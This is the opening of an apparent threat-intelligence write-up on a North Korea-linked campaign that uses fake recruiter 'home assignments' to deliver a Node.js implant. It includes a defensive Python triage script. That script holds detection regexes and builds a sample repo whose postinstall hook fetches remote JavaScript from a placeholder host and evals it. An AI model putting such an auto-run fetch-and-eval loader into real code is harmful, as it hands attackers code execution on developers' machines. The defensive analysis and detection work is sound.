Beyond eval(): DPRK’s New Malware Strategy Hidden in Job Assignments
Targeted recruiter lure delivers a multi-stage Node.js implant with clipboard, keylogging, and recursive secret harvesting.
Threat Actor Profiles
Malware Analysis
Summary: A targeted social-engineering campaign uses a fake recruiter and a public GitLab “home assignment” to deliver a multi-stage Node.js implant. The repo auto-runs a loader that fetches a cross-OS JavaScript payload from C2. The payload provides an interactive socket.io C2 shell, host fingerprinting, clipboard exfiltration, runtime dependency installation, and a second-stage harvester/keylogger that recursively steals wallet files and developer secrets. The campaign is contagious — anyone who clones & runs the assignment is at risk.
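The summary describes two behaviours a defender can check for before running a recruiter's "home assignment": a loader wired to run automatically when the repo is installed, and a script that fetches remote JavaScript and evaluates it. The following triage script is an added example, not code from the original write-up or from the campaign; the npm lifecycle hook names and the regexes are assumptions about how such repos are typically wired, not indicators taken from this campaign, and the sample repository it builds is constructed.

```python
"""Pre-run triage of a cloned Node.js 'home assignment' repository.

Added example (not from the original write-up). It flags npm lifecycle
hooks that execute automatically during `npm install` and JavaScript
sources that show a fetch-then-eval loader shape. Hook names and regexes
are assumed heuristics, not campaign indicators.
"""
import json
import os
import re
import tempfile

# npm lifecycle scripts that run without the user explicitly invoking them.
AUTO_RUN_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Assumed heuristics a reviewer would want surfaced before running anything.
SUSPICIOUS_PATTERNS = {
    "dynamic_eval": re.compile(r"\b(eval|new\s+Function)\s*\("),
    "remote_fetch": re.compile(r"\b(fetch|axios\.get|https?\.get)\s*\("),
    "child_process": re.compile(r"require\(['\"]child_process['\"]\)"),
    "socket_io_client": re.compile(r"require\(['\"]socket\.io-client['\"]\)"),
    "runtime_install": re.compile(r"\bnpm\s+(install|i)\b"),
}


def lifecycle_hooks(package_json_text: str) -> dict:
    """Return only the auto-run scripts declared in a package.json."""
    try:
        scripts = json.loads(package_json_text).get("scripts", {})
    except json.JSONDecodeError:
        return {}
    return {k: v for k, v in scripts.items() if k in AUTO_RUN_HOOKS}


def scan_source(text: str) -> set:
    """Return the labels of every heuristic that matches the source text."""
    return {label for label, rx in SUSPICIOUS_PATTERNS.items() if rx.search(text)}


def triage_repo(root: str) -> dict:
    """Walk a cloned repo (skipping node_modules/.git) and collect findings."""
    findings = {"auto_run": {}, "files": {}}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in ("node_modules", ".git")]
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            if name == "package.json":
                hooks = lifecycle_hooks(text)
                if hooks:
                    findings["auto_run"][rel] = hooks
            elif name.endswith((".js", ".mjs", ".cjs", ".ts")):
                hits = scan_source(text)
                if hits:
                    findings["files"][rel] = sorted(hits)
    return findings


def verdict(findings: dict) -> str:
    """Auto-run hook plus a fetch-then-eval source is the worst combination."""
    loader_shape = any(
        "dynamic_eval" in hits and "remote_fetch" in hits
        for hits in findings["files"].values()
    )
    if findings["auto_run"] and loader_shape:
        return "do-not-run"
    if findings["auto_run"] or findings["files"]:
        return "review"
    return "clean"


def build_demo_repo() -> str:
    """Create a constructed sample repo with the shape the summary describes."""
    root = tempfile.mkdtemp(prefix="assignment-")
    files = {
        "package.json": json.dumps({
            "name": "home-assignment",
            "scripts": {"test": "jest", "postinstall": "node setup.js"},
        }),
        # Constructed loader fragment: fetch remote text, then eval it.
        "setup.js": (
            "const https = require('https');\n"
            "https.get('https://example.invalid/payload.js', (res) => {\n"
            "  let body = '';\n"
            "  res.on('data', (chunk) => { body += chunk; });\n"
            "  res.on('end', () => eval(body));\n"
            "});\n"
        ),
        "index.js": "console.log('assignment');\n",  # benign, must not be flagged
    }
    for rel, content in files.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    demo = build_demo_repo()
    result = triage_repo(demo)
    print(json.dumps(result, indent=2))
    print("verdict:", verdict(result))
```

Run it against a freshly cloned directory instead of the demo path; a `postinstall` hook alone earns a `review`, and the combination with a fetch-then-eval source returns `do-not-run` before `npm install` ever executes.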
Table of contents
High Level Overview
Social engineering & delivery timeline
Repository hosting
Technical timeline & high-level flow
Stage 1 — Beacon, C2, interactive shell & clipboard
Stage 2 — Harvester, keylogger & exfil
C2 pivot in commit history (.cloud → .com)
Capability matrix & MITRE ATT&CK mapping
…